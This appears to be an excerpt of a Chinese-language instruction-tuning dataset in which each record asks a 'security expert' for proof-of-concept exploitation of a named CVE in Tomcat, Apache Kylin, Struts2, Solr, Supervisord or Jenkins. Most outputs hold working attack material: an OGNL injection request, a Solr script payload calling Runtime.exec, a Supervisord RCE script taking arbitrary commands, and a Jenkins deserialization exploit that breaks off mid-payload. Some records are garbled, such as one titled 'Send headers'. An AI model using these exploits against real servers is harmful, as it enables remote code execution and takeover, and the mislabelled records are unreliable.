  185. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Tomcat PUT方法任意写文件漏洞 CVE-2017-12615\n漏洞描述:参考: - http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html - https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 - https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: ``` <servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>listings</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>readonly</param-name> <param-value>false</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> ``` 虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。\n影响版本:``` Apache Tomcat 7.0.0-7.0.81(默认配置) ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12615\n【POC利用方法】\n1. <servlet>\n    <servlet-name>default</servlet-name>\n    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>\n    <init-param>\n        <param-name>debug</param-name>\n        <param-value>0</param-value>\n    </init-param>\n    <init-param>\n        <param-name>listings</param-name>\n        <param-value>false</param-value>\n    </init-param>\n    <init-param>\n        <param-name>readonly</param-name>\n        <param-value>false</param-value>\n    </init-param>\n    <load-on-startup>1</load-on-startup>\n</servlet>\n2. Apache Tomcat 7.0.0-7.0.81(默认配置)\n3. docker-compose build\ndocker-compose up -d\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Tomcat PUT方法任意写文件漏洞 CVE-2017-12615.md"}
    186. 

  186. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin config 未授权配置泄露 CVE-2020-13937\n漏洞描述:Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息\n网络测绘:``` app=\"APACHE-kylin\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13937\n【POC利用方法】\n1. app=\"APACHE-kylin\"\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. /kylin/api/admin/config\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md"}
    187. 

  187. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805\n漏洞描述:该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。\n影响版本:``` Struts 2.0.0 - Struts 2.5.29 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-31805\n【POC利用方法】\n1. Struts 2.0.0 - Struts 2.5.29\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/struts2/s2-061\ndocker-compose up -d\n3. POST /index.action HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 829\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805.md"}
    188. 

  188. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 远程命令执行漏洞 CVE-2019-0193\n漏洞描述:漏洞原理与分析可以参考: - https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA - https://paper.seebug.org/1009/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 本环境测试RCE漏洞。\n影响版本:``` Apache Solr < 8.2.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-0193\n【POC利用方法】\n1. Apache Solr < 8.2.0\n2. docker-compose up -d\ndocker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db\n3. <dataConfig>\n  <dataSource type=\"URLDataSource\"/>\n  <script><![CDATA[\n          function poc(){ java.lang.Runtime.getRuntime().exec(\"touch /tmp/success\");\n          }\n  ]]></script>\n  <document>\n    <entity name=\"stackoverflow\"\n            url=\"https://stackoverflow.com/feeds/tag/solr\"\n            processor=\"XPathEntityProcessor\"\n            forEach=\"/feed\"\n            transformer=\"script:poc\" />\n  </document>\n</dataConfig>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr 远程命令执行漏洞 CVE-2019-0193.md"}
    189. 

  189. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Supervisord 远程命令执行漏洞 CVE-2017-11610\n漏洞描述:Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 参考链接: - https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html - https://blogs.securiteam.com/index.php/archives/3348 - https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-11610\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. POST /RPC2 HTTP/1.1\nHost: your-ip:9001\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 213\n\n<?xml version=\"1.0\"?>\n<methodCall>\n<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n<params>\n<param>\n<string>touch /tmp/awesome_poc</string>\n</param>\n</params>\n</methodCall>\n3. #!/usr/bin/env python3\nimport xmlrpc.client\nimport sys\n\n\ntarget = sys.argv[1]\ncommand = sys.argv[2]\nwith xmlrpc.client.ServerProxy(target) as proxy:\n    old = getattr(proxy, 'supervisor.readLog')(0,0)\n\n    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()\n    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))\n    result = getattr(proxy, 'supervisor.readLog')(0,0)\n\n    print(result[len(old):])\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Supervisord 远程命令执行漏洞 CVE-2017-11610.md"}
    190. 

  190. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956\n漏洞描述:2020年5月22日,CNVD通报了 Apache Kylin存在命令注入漏洞 CVE-2020-1956 Apache Kylin 是美国 Apache软件基金会的一款开源的分布式分析型数据仓库。该产品主要提供 Hadoop/Spark之上的 SQL查询接口及多维分析(OLAP)等功能。\n影响版本:``` Apache Kylin 2.3.0 ~ 2.3.2 Apache Kylin 2.4.0 ~ 2.4.1 Apache Kylin 2.5.0 ~ 2.5.2 Apache Kylin 2.6.0 ~ 2.6.5 Apache Kylin 3.0.0-alpha ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-1956\n【POC利用方法】\n1. Apache Kylin 2.3.0 ~ 2.3.2\nApache Kylin 2.4.0 ~ 2.4.1\nApache Kylin 2.5.0 ~ 2.5.2\nApache Kylin 2.6.0 ~ 2.6.5\nApache Kylin 3.0.0-alpha\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. POST /kylin/api/cubes/{cube}/{project}/migrate\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956.md"}
    191. 

  191. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Send headers\n漏洞描述:1.638之前的Jenkins和1.625.2之前的LTS中的`Jenkins CLI`子系统,允许远程攻击者通过制作的序列化Java对象执行有问题的`commons-collections`。\n影响版本:``` Jenkins jenkins<= LTS 1.625.1 Jenkins jenkins<= 1.637 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. Jenkins jenkins<= LTS 1.625.1\nJenkins jenkins<= 1.637\n2. $ docker pull medicean/vulapps:j_jenkins_1\n$ docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1\n3. #! /usr/bin/env python2\n\n#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)\n#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport socket\nimport sys\nimport base64\nimport argparse\nimport os\nfrom subprocess import check_output\n\nysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']\nysoserial_path = None\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')\nparser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif not args.ysoserial_path:\n    for path in ysoserial_default_paths:\n        if os.path.exists(path):\n            ysoserial_path = path\nelse:\n    if os.path.exists(args.ysoserial_path):\n        ysoserial_path = args.ysoserial_path\n\nif ysoserial_path is None:\n    print(\"[-] Could not find ysoserial JAR file\")\n    sys.exit(1)\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nhost, port = args.target.split(':')\n\nprint('[*] Target IP: {}'.format(host))\nprint('[*] Target PORT: {}'.format(port))\nprint('\\n')\n\nprint('[*] Retrieving the Jenkins CLI port')\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('{}://{}:{}'.format(args.proto, host, port))\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, cli_port)\nprint('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port))\nsock.connect(server_address)\n\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint('[*] Sending headers')\nsock.send(headers)\n\ndata = sock.recv(1024)\nprint('[*] Received \"{}\"'.format(data))\n\nif data.find('JENKINS REMOTING CAPACITY') == -1:\n    data = sock.recv(1024)\n    print('[*] Received \"{}\"'.format(data))\n\npayloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65